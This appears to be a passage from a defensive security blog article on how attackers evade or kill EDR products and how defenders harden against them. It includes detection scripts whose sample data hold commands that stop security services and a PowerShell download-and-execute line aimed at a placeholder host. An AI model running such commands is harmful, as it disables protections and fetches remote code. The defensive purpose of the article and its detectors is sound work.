There have been instances of malware that abuse OS features to isolate or confuse EDRs. For example, some malware ran itself in a Hyper-V virtual machine on the host (yes, malware installing a tiny hypervisor!) so that it could execute underneath the EDR — effectively a reverse sandbox to hide its actions. That’s extreme and not common, but it shows the creativity on both sides of the battlefield. Interestingly, Windows itself leverages a similar trick with Credential Guard, which isolates critical LSASS memory using virtualization-based security. This effectively creates a protected bubble that even powerful credential-dumping tools like Mimikatz struggle to pierce. It’s a classic example of security tools and attackers using the same playbook, but with opposite intentions.
We’ve also seen attacks on the EDR software itself in terms of exploits. An attacker might exploit a vulnerability in an EDR driver or agent to achieve code execution in the kernel (similar to BYOVD, but using the EDR’s own flaws). Check Point Research in 2024 demonstrated chaining bugs in a security product’s driver to bypass its protections and gain kernel execution. While this is more about defeating the product’s own protection, it underscores that EDRs, being software, can have vulnerabilities too — a savvy attacker might find an EDR bypass not by evading it, but by hacking it directly. Fortunately, no widespread in-the-wild exploitation of an EDR product has been publicized in recent years (that would be quite bad), but it remains a real possibility.
On the simpler end, attackers who gain admin rights might attempt to just uninstall the EDR or delete its files. Many EDRs block uninstallation without a special code or have drivers preventing deletion — but misconfigured ones or older AV products have been successfully removed by malware in the past. There’s also the tactic of changing settings: if an organization hasn’t locked down EDR settings, malware might flip some registry keys or local group policies to turn off components like script scanning, firewall, etc., making its job easier.
Ransomware Gangs: These crews have been the biggest adopters of EDR killing. When the name of the game is to encrypt everything as fast as possible, they don’t want an EDR stopping the encryption or detecting them during pre-encryption staging. Apart from BYOVD, some ransomware (like variants of Akira or LockBit affiliates) have used scripts that terminate processes and services based on a hardcoded list of names targeting AV/EDR products. Those scripts run with admin rights and simply call taskkill or Stop-Service on dozens of known security processes. It’s noisy, but if you’re minutes away from detonating ransomware, you might not care about stealth at that point. The presence of such kill lists is an IoC in many incident response reports.
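Those hardcoded kill lists are easy to hunt for in their own right. Here is a hedged sketch of scanning a recovered script for the pattern: a kill command combined with a watchlisted security-product process name. The watchlist entries below are examples; the one you deploy should be built from your own security stack.

```python
# Sketch: flag script lines that try to stop known security processes or
# services. Watchlist entries are examples; tailor them to your environment.
EDR_WATCHLIST = {"msmpeng.exe", "sentinelagent.exe", "csfalconservice.exe"}

def find_kill_list_iocs(script_text: str) -> list[str]:
    """Return lines that combine a kill command with a watchlisted name."""
    hits = []
    for line in script_text.lower().splitlines():
        if not any(cmd in line for cmd in ("taskkill", "stop-service", "net stop")):
            continue
        if any(p in line or p.removesuffix(".exe") in line for p in EDR_WATCHLIST):
            hits.append(line.strip())
    return hits

sample = "taskkill /F /IM MsMpEng.exe\nStop-Service -Name SentinelAgent -Force"
print(find_kill_list_iocs(sample))
```

A real rule would also watch process creation telemetry for the same command lines at runtime, not just scan files after the fact.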
APT groups: They prefer stealth, so outright killing EDR might be too noisy for a long-term espionage op (the target SOC might notice if their EDR died suddenly). However, some APTs have used tampering in more subtle ways — for instance, temporarily suspending EDR monitoring during critical actions, or using kernel malware to filter out the EDR’s telemetry (essentially feeding it bogus info). One advanced example: the Slingshot APT in the past had a kernel module that sat beneath an AV and intercepted its requests, filtering what it saw. That’s next-level and rare. Generally, APTs might only disable EDR if it’s part of an active defense evasion during, say, a high-impact action (like deploying a wiper or something where they don’t care if they burn the house down after).
From the defender side, hardening the endpoint is key here. Microsoft introduced a driver blocklist for known bad drivers to mitigate BYOVD — but it needs to be enabled (via Memory Integrity / HVCI). Organizations should ensure that’s on, so at least the known vulnerable drivers can’t be loaded. EDRs themselves now often have a kernel mode component that can watch for rogue driver loads or critical process handles — for example, if an unsigned or unexpected driver is loaded, raise an alert, or if a user-mode process tries to kill the security service, block it. Some EDRs run as Protected Process Light (PPL) so that even if malware has admin rights, it cannot easily terminate the EDR (unless it goes BYOVD, as we saw).
Detecting BYOVD might involve noticing a legit driver file popping up where it shouldn’t, or an unexpected service installation. It’s tricky, but threat intelligence has helped; once a tool like Spyboy’s Terminator is known, the hashes of its driver or the behavior pattern (driver named sysprep.sys in system32, for instance) can be added to detection.
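One building block for that detection is hash-matching dropped drivers against a known-vulnerable list, such as the loldrivers.io dataset or Microsoft’s blocklist. A minimal sketch, with a simulated threat-intel feed standing in for real blocklist entries:

```python
import hashlib

# Placeholder blocklist; in practice, load SHA-256 hashes from the
# loldrivers.io dataset or Microsoft's vulnerable-driver blocklist.
BLOCKED_DRIVER_SHA256 = set()

def driver_is_blocked(driver_bytes: bytes) -> bool:
    """Check a driver image against the known-vulnerable hash set."""
    return hashlib.sha256(driver_bytes).hexdigest() in BLOCKED_DRIVER_SHA256

# Simulate learning a bad driver's hash from threat intel, then catching it:
fake_driver = b"MZ\x90\x00 fake vulnerable driver image"
BLOCKED_DRIVER_SHA256.add(hashlib.sha256(fake_driver).hexdigest())
print(driver_is_blocked(fake_driver))  # → True
```

Hash matching alone is brittle (attackers can grab a not-yet-listed vulnerable driver), so pair it with behavioral signals like a new service installing a driver from a user-writable path.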
Ultimately, an attacker going loud and trying to kill the EDR is a scenario that, if detected in time, should trigger the highest-severity alerts — it’s basically a big sign that says “Intruder is here, and trying to blind you!” We’ll discuss in the next section how to prepare for and respond to such moves.
We’ve toured through a lot of evasion territory — from sneaky LOLBins, to injecting malware in friendly hosts, to disarming the watchdogs themselves. You might be thinking it sounds hopeless: attackers have a whole bag of tricks! But all is not lost. In fact, knowing these techniques is the first step in defending against them. In the final section, let’s discuss how companies can harden their environments and improve detection, turning the tables on these evasions.
Attackers may be clever, but a well-prepared defender can make their life much harder. EDR evasion techniques thrive on gaps in visibility or lapses in policy. To close those gaps, consider the following defenses-in-depth to counter each category of evasion we discussed:
- Behavioral Analytics & Anomaly Detection: Since so many evasion techniques abuse legitimate tools (LOLBins) or normal processes, it’s crucial to baseline normal behavior and catch the weird stuff. For example, monitor and alert on unusual usage of admin tools — if powershell.exe starts encoding commands or mshta.exe spawns a CMD, that’s probably suspect. EDR solutions should employ behavioral analytics to detect when trusted binaries are being misused. Investing in a security analytics platform or extending your EDR’s built-in behavioral rules is key. In practice, implement rules like “Office applications spawning scripting processes” or “Command-line tools downloading from the internet” and tune them to your environment.
- Attack Surface Reduction (ASR): Not just a Microsoft buzzword — reducing what’s available for attackers to abuse can pay off big. If your users never need WMIC.exe or CertUtil.exe, consider blocking them via AppLocker or Windows Defender’s Attack Surface Reduction rules. There are ASR rules specifically to block things like suspicious behavior of PSExec/PAExec, or Office spawning child processes. By cutting off some LOLBins entirely, you force attackers to use less convenient methods (which might be noisier or easier to detect). Also disable or restrict unnecessary scripting engines where possible (e.g., WScript, cscript). The less “living off the land” available, the more an attacker has to “live off the custom”, which is easier to catch.
- Memory Integrity & Driver Control: Enable Memory Integrity / Hypervisor-Protected Code Integrity (HVCI) on capable systems to leverage the driver blocklist Microsoft maintains. This can prevent known vulnerable drivers from loading, thwarting many BYOVD attempts. Additionally, keep an eye on software that installs drivers and ensure they are up to date (vulnerable drivers often come from legitimate software that hasn’t been patched — maintain an inventory). Consider using Microsoft’s Vulnerable Driver Blocklist or third-party tools that monitor driver loads. Some EDRs now will flag if an unusual driver is loaded or if a legitimate driver is being used in an odd way (e.g., dumped into an unusual directory then loaded).
- EDR Self-Protection and Monitoring: Make sure your EDR’s tamper protection is turned on everywhere. Test it — try to stop the service or delete its files on a test machine (with permission!) to ensure it truly holds up. An EDR that can run as PPL and has a strong self-defense will force attackers to spend more time (which increases likelihood of detection) or use kernel exploits (which are rarer). Also, ensure your EDR is configured to monitor for indications of hooking bypass: some EDRs log when they detect direct syscalls or unhooking activity (e.g., if they find their hooks removed). If your EDR can alert on “integrity failures” of its hooks or unexpected syscalls, treat those alerts as high priority — even if the EDR doesn’t fully block the action, it’s a sign of an advanced attempt underway.
- Memory Scanning and Canary Threads: Encourage or enable memory scanning features in your EDR if available. Some EDRs can do scan-on-demand or have rules like “scan process memory if it makes a network connection and it wasn’t a known process” to catch fileless implants. Likewise, some defenders set up canary processes or threads — basically dummy processes that have no business being touched, and if something injects into them or tampers, it’s definitely malicious. While not common out-of-the-box, creative threat hunters could set traps like that.
- Monitor for Injection Artifacts: Even if attackers try to hide threads, there are artifacts. Use EDR and OS event logs to watch for things like process handle opens with suspicious access, calls to VirtualAllocEx/WriteProcessMemory, and so on. Sysmon (if you use it) with the right config can log remote thread creations. An injected thread might still have to call Win32 APIs eventually – anomalies like a thread in explorer.exe calling WinInet to talk to an IP that explorer normally wouldn’t, could be flagged. Emerging EDR techniques also look at call stack patterns; while that’s more in vendor territory, as a customer you can demand these capabilities or supplement with endpoint monitoring tools that do stack analysis on events.
- PowerShell & AMSI Logging: Enable PowerShell Constrained Language Mode for regular users if possible, or at least turn on PowerShell Script Block Logging and AMSI integration in your AV/EDR. AMSI can catch a lot of script-based malware unless it’s obfuscated to the gills. Yes, attackers can bypass AMSI by patching (which itself can be detected by some solutions when the AMSI DLL is modified in memory), but many opportunistic attacks won’t bother if they don’t have to. Logging script activity means even if something fileless happens, you have an audit trail to investigate after the fact.
- Network and Cloud Analytics: Sometimes, no matter how good your endpoint is, something may slip by initially. Complement EDR with network monitoring — if a host that’s normally quiet starts beaconing out to an IP in a foreign country on an unusual port, that’s a clue. Network analytics can catch C2 traffic even if the malware is memory-resident and EDR-blinded. Also, many EDRs have cloud-based sandboxing: if a file is unknown, it detonates it in a sandbox. Make sure that’s enabled — it might catch something that tries to be fileless by examining its behavior in a safe environment.
- Hunt for Abuse of Legit Tools: Proactively threat hunt for signs of LOLBin abuse and injection. For example, query your EDR data for instances of rundll32.exe executing with unusual arguments, or regsvr32.exe loading from temp folders. Look for processes with mismatched names (e.g., a process named svchost.exe running from an atypical directory – could be hollowed). Hunt for multiple copies of ntdll loaded in the same process – if your EDR or memory forensics tool can show that, it’s almost certainly malicious (legit processes shouldn’t have two ntdlls loaded).
- User Education and Phishing Defense: While not directly EDR-evasion, a huge chunk of these attacks start with phishing or user execution of something. By reducing successful initial footholds (through training, phishing prevention, hardening macros, etc.), you reduce the chances you even have to deal with EDR evasion. It’s trite but true: if they can’t get in, they can’t do all this fancy stuff.
- Incident Response Planning: Assume that someday an attacker might drop an “EDR killer” on one of your hosts. Plan for it. If an endpoint stops reporting or the EDR agent dies mysteriously, have playbooks to isolate that machine immediately and investigate out-of-band. Keep memory forensics tools handy — as shown by research, even stealthy malware often leaves traces in RAM that can be uncovered with specialist tools (Volatility plugins, etc.). Regular drills where EDR is “blinded” and you rely on other logs can help prepare for the real thing.
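To make a couple of the bullets above concrete: the “Office applications spawning scripting processes” rule reduces to a tiny parent/child check. The process lists here are illustrative starting points, not a complete rule set.

```python
# Toy behavioral rule: suspicious parent -> child process pairs.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_ENGINES = {"powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "cmd.exe"}

def is_suspicious_spawn(parent: str, child: str) -> bool:
    """Flag an Office app launching a scripting engine."""
    return parent.lower() in OFFICE_APPS and child.lower() in SCRIPT_ENGINES

print(is_suspicious_spawn("WINWORD.EXE", "powershell.exe"))  # → True
print(is_suspicious_spawn("explorer.exe", "notepad.exe"))    # → False
```

Real rules need exclusions (some line-of-business macros legitimately spawn scripts), which is why the tuning step in the bullet matters.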
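The remote-thread artifacts mentioned under “Monitor for Injection Artifacts” surface as Sysmon Event ID 8 (CreateRemoteThread). Here is a sketch of filtering such events once they have been parsed into dicts, say from a SIEM export; the field names follow Sysmon’s schema, but the sample records are invented.

```python
# Flag CreateRemoteThread events (Sysmon Event ID 8) targeting sensitive
# processes from a different image -- a classic injection indicator.
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe", "explorer.exe"}

def flag_remote_threads(events: list[dict]) -> list[tuple[str, str]]:
    alerts = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue
        src = ev["SourceImage"].rsplit("\\", 1)[-1].lower()
        tgt = ev["TargetImage"].rsplit("\\", 1)[-1].lower()
        if src != tgt and tgt in SENSITIVE_TARGETS:
            alerts.append((src, tgt))
    return alerts

events = [
    {"EventID": 8, "SourceImage": "C:\\Users\\bob\\evil.exe",
     "TargetImage": "C:\\Windows\\explorer.exe"},
    {"EventID": 1, "SourceImage": "C:\\Windows\\cmd.exe", "TargetImage": ""},
]
print(flag_remote_threads(events))  # → [('evil.exe', 'explorer.exe')]
```

Note that some injection techniques (e.g., thread hijacking via SetThreadContext) never create a remote thread, so this catches only one artifact class.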
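On the PowerShell logging bullet: encoded commands (-EncodedCommand) are base64 over UTF-16LE, so analysts can recover the script text straight from a logged command line. A minimal decoder sketch (the regex is deliberately simplified; PowerShell accepts more abbreviation and quoting forms than it handles):

```python
import base64
import re
from typing import Optional

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind powershell -enc/-EncodedCommand, if any."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    # PowerShell encodes the script as base64 over UTF-16LE text
    return base64.b64decode(m.group(1)).decode("utf-16-le")

payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
cmd = "powershell.exe -enc " + base64.b64encode(payload.encode("utf-16-le")).decode()
print(decode_encoded_command(cmd))
```

Even this trivial decoding step turns an opaque command line into searchable script content for your hunting queries.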
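And the “mismatched names” hunt from the same list: compare a process’s image path against where that binary legitimately lives. The expected-path map below is a hypothetical example; in practice, build it from a golden image, and remember legitimate exceptions such as svchost.exe also living in SysWOW64 on 64-bit Windows.

```python
# Flag system-binary names running from atypical directories
# (a common masquerading / hollowing indicator). Map is illustrative.
EXPECTED_DIRS = {
    "svchost.exe": "c:\\windows\\system32",
    "lsass.exe": "c:\\windows\\system32",
    "explorer.exe": "c:\\windows",
}

def is_masquerading(image_path: str) -> bool:
    """True if a known binary name runs from an unexpected directory."""
    directory, _, name = image_path.lower().rpartition("\\")
    expected = EXPECTED_DIRS.get(name)
    return expected is not None and directory != expected

print(is_masquerading("C:\\Users\\Public\\svchost.exe"))      # → True
print(is_masquerading("C:\\Windows\\System32\\svchost.exe"))  # → False
```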
Ultimately, the battle between attackers and EDRs is very much alive and evolving. Attackers will keep finding ingenious ways to tiptoe around defenses — from carving their own path to the kernel with syscalls, to borrowing your glasses (LOLBins) so you don’t recognize them, or cutting the wires entirely with driver exploits. But knowledge is power. By understanding these evasion techniques, security teams can better tune their defenses to catch the sly behavior that betrays an intruder. It’s a game of cat-and-mouse, yes — but it’s a game we can win by staying informed, adaptive, and layered in our approach.
Stay safe, stay vigilant, and may your endpoints be ghost-proof!
References:
- Hutchins, M. “An Introduction to Bypassing User Mode EDR Hooks.” MalwareTech Blog, Dec 2023.
- Case, A. “Defeating EDR-Evading Malware with Memory Forensics.” DEF CON 31 White Paper, Aug 2023.
- VMRay. “Just Carry a Ladder — Why Your EDR Let Pikabot Jump Through.” VMRay Blog, 2023.
- Paritosh. “How Attackers Bypass EDR and How to Defend Against Them.” Medium, Oct 2024.
- Von Tish, L. “EDR Bypass with LoLBins.” Bishop Fox Blog, Mar 2023.
- Cobalt Strike Developer Blog. “Cobalt Strike 4.11 — Beacon is Sleeping….” Aug 2022.
- Cybereason. “Sliver C2 Leveraged by Many Threat Actors.” Cybereason Lab Analysis, 2022.
- Check Point Research. “Breaking Boundaries: Vulnerable Drivers and Mitigating Risks.” Sep 2024.
- Halcyon. “Blocking BYOVD Techniques to Prevent AV/EDR Bypasses.” Jun 2024.
- Sophos News. “RansomHub rolls out brand-new, EDR-killing BYOVD binary ‘EDRKillShifter’.” (Referenced via SecurityAffairs), Aug 2024.